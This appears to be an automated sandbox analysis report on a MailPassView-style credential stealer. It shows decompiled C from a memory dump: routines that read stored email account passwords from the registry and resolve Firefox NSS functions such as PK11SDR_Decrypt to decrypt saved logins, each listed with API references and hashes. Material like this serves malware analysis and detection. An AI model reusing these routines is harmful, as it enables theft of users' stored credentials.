                                                                                              					L3:
                                                                                              					_t201 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                              					E00409EC4(_t201);
                                                                                              					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
                                                                                              					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
                                                                                              						E00409E32(_t133, _t173, _t194, _t201);
                                                                                              					}
                                                                                              					_t202 = 0x68;
                                                                                              					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
                                                                                              					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
                                                                                              					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
                                                                                              						_t174 = 0x412466;
                                                                                              					} else {
                                                                                              						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
                                                                                              							_t174 = 0;
                                                                                              						} else {
                                                                                              							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
                                                                                              						}
                                                                                              					}
                                                                                              					_push("/noloadsettings");
                                                                                              					_push(_t174);
                                                                                              					L004115B2();
                                                                                              					if(_t135 == 0) {
                                                                                              						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                                              					}
                                                                                              					E0040AF17(_t194, 0);
                                                                                              					 *( *(_t194 + 0x36c)) = 1;
                                                                                              					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
                                                                                              					if( *0x417660 == 0) {
                                                                                              						E00406172(0x417660);
                                                                                              						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
                                                                                              							GetTempPathA(0x104, 0x417660);
                                                                                              						}
                                                                                              					}
                                                                                              					_t204 = strlen(0x417660);
                                                                                              					 *_t211 = "report.html";
                                                                                              					_t99 = strlen(??) + 1; // 0x1
                                                                                              					_t223 = _t204 + _t99 - 0x104;
                                                                                              					if(_t204 + _t99 >= 0x104) {
                                                                                              						 *((char*)(_t194 + 0x264)) = 0;
                                                                                              					} else {
                                                                                              						E004062AD(_t194 + 0x264, 0x417660, "report.html");
                                                                                              					}
                                                                                              					_push(1);
                                                                                              					_t178 = 0x30;
                                                                                              					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
                                                                                              					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
                                                                                              					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
                                                                                              					_t205 = _t194;
                                                                                              					 *(_t194 + 0x374) = _t149;
                                                                                              					E0040A27F(0, 1, _t205, _t223);
                                                                                              					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
                                                                                              					 *(_t208 + 0x60) = 0x12c;
                                                                                              					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
                                                                                              					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
                                                                                              					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
                                                                                              				} else {
                                                                                              					_t207 = _t200 + 0xc;
                                                                                              					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
                                                                                              					do {
                                                                                              						_t173 =  *((intOrPtr*)(_t207 - 8));
                                                                                              						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
                                                                                              						_t211 = _t211 + 0x10;
                                                                                              						_t207 = _t207 + 0x14;
                                                                                              						_t82 = _t208 + 0x74;
                                                                                              						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
                                                                                              					} while ( *_t82 != 0);
                                                                                              					goto L3;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                                • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                                                • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                              • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                              • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                              • SendMessageA.USER32 ref: 0040A8DA
                                                                                              • LoadImageA.USER32 ref: 0040A8F0
                                                                                              • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                              • CreateWindowExA.USER32 ref: 0040A950
                                                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                              • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                              • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                              • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                              • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                              • strlen.MSVCRT ref: 0040AA82
                                                                                              • strlen.MSVCRT ref: 0040AA90
                                                                                              • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                                • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                                • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
                                                                                              • SendMessageA.USER32 ref: 0040AB37
                                                                                              • SendMessageA.USER32 ref: 0040AB4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                              • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                              • API String ID: 873469642-860065374
                                                                                              • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                              • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                              • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                              • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                                                              				char _v0;
                                                                                              				struct HWND__* _v4;
                                                                                              				void* __edi;
                                                                                              				void* _t44;
                                                                                              				void* _t58;
                                                                                              				int _t59;
                                                                                              				int _t61;
                                                                                              				int _t62;
                                                                                              				long _t66;
                                                                                              				struct HWND__* _t93;
                                                                                              				intOrPtr _t122;
                                                                                              				unsigned int _t125;
                                                                                              				signed int _t127;
                                                                                              				signed int _t128;
                                                                                              				void* _t134;
                                                                                              
                                                                                              				_t128 = _t127 & 0xfffffff8;
                                                                                              				E004118A0(0x1424, __ecx);
                                                                                              				_t44 = _a8 - 0x110;
                                                                                              				if(_t44 == 0) {
                                                                                              					E00406491(__edx, _a4);
                                                                                              					 *_t128 = 0x7ff;
                                                                                              					_a3104 = 0;
                                                                                              					memset( &_a3105, 0, ??);
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsw");
                                                                                              					memset( &_a10, 0, 0xfb);
                                                                                              					_a520 = 0;
                                                                                              					memset( &_a521, 0, 0xff);
                                                                                              					_a264 = 0;
                                                                                              					memset( &_a265, 0, 0xff);
                                                                                              					_a1056 = 0;
                                                                                              					memset( &_a1057, 0, 0x3ff);
                                                                                              					_a2080 = 0;
                                                                                              					memset( &_a2081, 0, 0x3ff);
                                                                                              					_t134 = _t128 + 0x48;
                                                                                              					_t58 = GetCurrentProcess();
                                                                                              					_t102 =  &_a520;
                                                                                              					_v4 = _t58;
                                                                                              					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
                                                                                              					__eflags = _t59;
                                                                                              					if(_t59 != 0) {
                                                                                              						E00406585( &_a1056,  &_a520, 4);
                                                                                              						_pop(_t102);
                                                                                              					}
                                                                                              					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
                                                                                              					__eflags = _t61;
                                                                                              					if(_t61 != 0) {
                                                                                              						E00406585( &_a2080,  &_a264, 0);
                                                                                              						_pop(_t102);
                                                                                              					}
                                                                                              					_t62 = E0040629C();
                                                                                              					__eflags = _t62;
                                                                                              					if(_t62 == 0) {
                                                                                              						E0040E056();
                                                                                              					} else {
                                                                                              						E0040E0DA();
                                                                                              					}
                                                                                              					__eflags =  *0x417514;
                                                                                              					if(__eflags != 0) {
                                                                                              						L17:
                                                                                              						_a776 = 0;
                                                                                              						memset( &_a780, 0, 0x114);
                                                                                              						_t122 =  *0x416e7c; // 0x0
                                                                                              						_t134 = _t134 + 0xc;
                                                                                              						_t66 = GetCurrentProcessId();
                                                                                              						 *0x417108 = 0;
                                                                                              						E0040E255(_t102, __eflags, _t66, _t122);
                                                                                              						__eflags =  *0x417108;
                                                                                              						if( *0x417108 != 0) {
                                                                                              							memcpy( &_a776, 0x416ff0, 0x118);
                                                                                              							_t134 = _t134 + 0xc;
                                                                                              							__eflags =  *0x417108;
                                                                                              							if( *0x417108 != 0) {
                                                                                              								strcpy( &_v0, E004061E6( &_a784));
                                                                                              							}
                                                                                              						}
                                                                                              						goto L20;
                                                                                              					} else {
                                                                                              						__eflags =  *0x417518;
                                                                                              						if(__eflags == 0) {
                                                                                              							L20:
                                                                                              							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
                                                                                              							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
                                                                                              							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                              							L21:
                                                                                              							return 0;
                                                                                              						}
                                                                                              						goto L17;
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t44 == 1) {
                                                                                              					_t125 = _a12;
                                                                                              					if(_t125 >> 0x10 == 0) {
                                                                                              						if(_t125 == 3) {
                                                                                              							_t93 = GetDlgItem(_a4, 0x3ea);
                                                                                              							_v4 = _t93;
                                                                                              							SendMessageA(_t93, 0xb1, 0, 0xffff);
                                                                                              							SendMessageA(_v4, 0x301, 0, 0);
                                                                                              							SendMessageA(_v4, 0xb1, 0, 0);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				goto L21;
                                                                                              			}



















                                                                                              APIs
                                                                                              Strings
                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                              • {Unknown}, xrefs: 0040DBFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				void _v531;
                                                                                              				char _v532;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				int _t39;
                                                                                              				void* _t44;
                                                                                              				struct HINSTANCE__* _t53;
                                                                                              				struct HINSTANCE__* _t56;
                                                                                              				struct HINSTANCE__** _t69;
                                                                                              
                                                                                              				_t69 = __esi;
                                                                                              				_v268 = 0;
                                                                                              				memset( &_v267, 0, 0x104);
                                                                                              				if(_a4 != 0) {
                                                                                              					E004060D0(0x104,  &_v268, _a4);
                                                                                              				}
                                                                                              				if(_v268 != 0) {
                                                                                              					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                                                              					SetCurrentDirectoryA( &_v268);
                                                                                              					_v532 = 0;
                                                                                              					memset( &_v531, 0, 0x104);
                                                                                              					_t39 = strlen("nss3.dll");
                                                                                              					_t13 = strlen( &_v268) + 1; // 0x1
                                                                                              					if(_t39 + _t13 >= 0x104) {
                                                                                              						_v532 = 0;
                                                                                              					} else {
                                                                                              						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                                                              					}
                                                                                              					_t44 = GetModuleHandleA( &_v532);
                                                                                              					 *_t69 = _t44;
                                                                                              					if(_t44 != 0) {
                                                                                              						L9:
                                                                                              						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                                                              						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                                                              						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                                                              						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                                                              						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
                                                                                              						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                                                              						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                                                              					} else {
                                                                                              						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                                                              						 *_t69 = _t53;
                                                                                              						if(_t53 != 0) {
                                                                                              							goto L9;
                                                                                              						} else {
                                                                                              							E0040DEA9();
                                                                                              							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                                                              							 *_t69 = _t56;
                                                                                              							if(_t56 != 0) {
                                                                                              								goto L9;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 0 |  *_t69 != 0x00000000;
                                                                                              			}















                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DF0F
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                              • memset.MSVCRT ref: 0040DF62
                                                                                              • strlen.MSVCRT ref: 0040DF6C
                                                                                              • strlen.MSVCRT ref: 0040DF7A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                              • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                              • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                              • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                              • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                              • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                              • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                              • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                              • API String ID: 1296682400-4029219660
                                                                                              • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                              • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                              • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                              • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 35%
                                                                                              			E00402606(void* __ecx, void* __fp0) {
                                                                                              				void* __esi;
                                                                                              				void* _t58;
                                                                                              				void* _t59;
                                                                                              				void* _t67;
                                                                                              				void* _t70;
                                                                                              				void* _t73;
                                                                                              				void* _t87;
                                                                                              				signed int _t90;
                                                                                              				void* _t92;
                                                                                              				signed int _t96;
                                                                                              				intOrPtr _t100;
                                                                                              				intOrPtr _t101;
                                                                                              				void* _t103;
                                                                                              				void* _t105;
                                                                                              				void* _t106;
                                                                                              				void* _t108;
                                                                                              				void* _t114;
                                                                                              
                                                                                              				_t114 = __fp0;
                                                                                              				_t92 = __ecx;
                                                                                              				_t103 = _t105 - 0x6c;
                                                                                              				_t106 = _t105 - 0x474;
                                                                                              				 *(_t103 + 0x4c) = "POP3 User Name";
                                                                                              				 *(_t103 + 0x50) = "IMAP User Name";
                                                                                              				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                                                              				 *(_t103 + 0x58) = "SMTP USer Name";
                                                                                              				 *(_t103 + 0x1c) = "POP3 Server";
                                                                                              				 *(_t103 + 0x20) = "IMAP Server";
                                                                                              				 *(_t103 + 0x24) = "HTTPMail Server";
                                                                                              				 *(_t103 + 0x28) = "SMTP Server";
                                                                                              				 *(_t103 + 0x3c) = "POP3 Password2";
                                                                                              				 *(_t103 + 0x40) = "IMAP Password2";
                                                                                              				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                                                              				 *(_t103 + 0x48) = "SMTP Password2";
                                                                                              				 *(_t103 + 0x2c) = "POP3 Port";
                                                                                              				 *(_t103 + 0x30) = "IMAP Port";
                                                                                              				 *(_t103 + 0x34) = "HTTPMail Port";
                                                                                              				 *(_t103 + 0x38) = "SMTP Port";
                                                                                              				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                                                              				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                                                              				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                                                              				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                                                              				_t90 = 0;
                                                                                              				do {
                                                                                              					 *(_t103 - 0x64) = 0;
                                                                                              					memset(_t103 - 0x63, 0, 0x7f);
                                                                                              					_push(_t103 - 0x64);
                                                                                              					_t96 = _t90 << 2;
                                                                                              					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                                                              					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                                                              					_t58 = 0x7f;
                                                                                              					_t59 = E0040EB80(_t58, _t92);
                                                                                              					_t106 = _t106 + 0x18;
                                                                                              					if(_t59 == 0) {
                                                                                              						E004021D8(_t103 - 0x408);
                                                                                              						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                                                              						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                                                              						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                                                              						_t34 = _t90 + 1; // 0x1
                                                                                              						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                                                              						_push(_t103 - 0x2f8);
                                                                                              						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                                                              						_push(_t100);
                                                                                              						_t67 = 0x7f;
                                                                                              						E0040EB80(_t67, _t92);
                                                                                              						_push(_t103 - 0x3fc);
                                                                                              						_push("SMTP Display Name");
                                                                                              						_push(_t100);
                                                                                              						_t70 = 0x7f;
                                                                                              						E0040EB80(_t70, _t92);
                                                                                              						_push(_t103 - 0x378);
                                                                                              						_push("SMTP Email Address");
                                                                                              						_push(_t100);
                                                                                              						_t73 = 0x7f;
                                                                                              						E0040EB80(_t73, _t92);
                                                                                              						_t108 = _t106 + 0x2c;
                                                                                              						if(_t90 != 3) {
                                                                                              							_push(_t103 - 0x278);
                                                                                              							_push("SMTP Server");
                                                                                              							_push(_t100);
                                                                                              							_t87 = 0x7f;
                                                                                              							E0040EB80(_t87, _t92);
                                                                                              							_t108 = _t108 + 0xc;
                                                                                              						}
                                                                                              						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                                                              						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                                                              						_t106 = _t108 + 0x18;
                                                                                              						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                                                              						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                                                              						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                                                              						_pop(_t92);
                                                                                              						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                                                              					}
                                                                                              					_t90 = _t90 + 1;
                                                                                              				} while (_t90 < 4);
                                                                                              				return _t59;
                                                                                              			}

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004026AE
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,7554ED80,?,00000000), ref: 004026EC
                                                                                              • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$QueryValuememset
                                                                                              • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                              • API String ID: 3373037483-1627711381
                                                                                              • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                              • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                              • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                              • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E004027D0(void* __fp0) {
                                                                                              				void* __esi;
                                                                                              				void* _t66;
                                                                                              				signed int _t92;
                                                                                              				void* _t95;
                                                                                              				intOrPtr _t109;
                                                                                              				void* _t111;
                                                                                              				void* _t113;
                                                                                              				void* _t114;
                                                                                              				void* _t121;
                                                                                              
                                                                                              				_t121 = __fp0;
                                                                                              				_t111 = _t113 - 0x70;
                                                                                              				_t114 = _t113 - 0x474;
                                                                                              				 *(_t111 + 0x40) = "POP3 Password";
                                                                                              				 *(_t111 + 0x44) = "IMAP Password";
                                                                                              				 *(_t111 + 0x48) = "HTTP Password";
                                                                                              				 *(_t111 + 0x4c) = "SMTP Password";
                                                                                              				 *(_t111 + 0x50) = "POP3 User";
                                                                                              				 *(_t111 + 0x54) = "IMAP User";
                                                                                              				 *(_t111 + 0x58) = "HTTP User";
                                                                                              				 *(_t111 + 0x5c) = "SMTP User";
                                                                                              				 *(_t111 + 0x20) = "POP3 Server";
                                                                                              				 *(_t111 + 0x24) = "IMAP Server";
                                                                                              				 *(_t111 + 0x28) = "HTTP Server URL";
                                                                                              				 *(_t111 + 0x2c) = "SMTP Server";
                                                                                              				 *(_t111 + 0x30) = "POP3 Port";
                                                                                              				 *(_t111 + 0x34) = "IMAP Port";
                                                                                              				 *(_t111 + 0x38) = "HTTP Port";
                                                                                              				 *(_t111 + 0x3c) = "SMTP Port";
                                                                                              				 *(_t111 + 0x60) = "POP3 Use SPA";
                                                                                              				 *(_t111 + 0x64) = "IMAP Use SPA";
                                                                                              				 *(_t111 + 0x68) = "HTTPMail Use SSL";
                                                                                              				 *(_t111 + 0x6c) = "SMTP Use SSL";
                                                                                              				_t92 = 0;
                                                                                              				do {
                                                                                              					 *(_t111 - 0x60) = 0;
                                                                                              					memset(_t111 - 0x5f, 0, 0x7f);
                                                                                              					_t114 = _t114 + 0xc;
                                                                                              					_t100 = _t92 << 2;
                                                                                              					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
                                                                                              					if(_t66 != 0) {
                                                                                              						E004021D8(_t111 - 0x404);
                                                                                              						strcpy(_t111 - 0x1f0, _t111 - 0x60);
                                                                                              						_pop(_t95);
                                                                                              						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
                                                                                              						_t37 = _t92 + 1; // 0x1
                                                                                              						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
                                                                                              						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
                                                                                              						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
                                                                                              						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
                                                                                              						if(_t92 != 3) {
                                                                                              							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
                                                                                              							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
                                                                                              							_t114 = _t114 + 0xc;
                                                                                              						}
                                                                                              						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
                                                                                              						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
                                                                                              						_t109 =  *((intOrPtr*)(_t111 + 0x78));
                                                                                              						_t114 = _t114 + 0x18;
                                                                                              						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
                                                                                              						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
                                                                                              						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
                                                                                              					}
                                                                                              					_t92 = _t92 + 1;
                                                                                              				} while (_t92 < 4);
                                                                                              				return _t66;
                                                                                              			}













                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402878
                                                                                                • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                              • strcpy.MSVCRT(?,?,7554ED80,?,00000000), ref: 004028B2
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7554ED80,?,00000000), ref: 00402980
                                                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$ByteCharMultiQueryValueWidememset
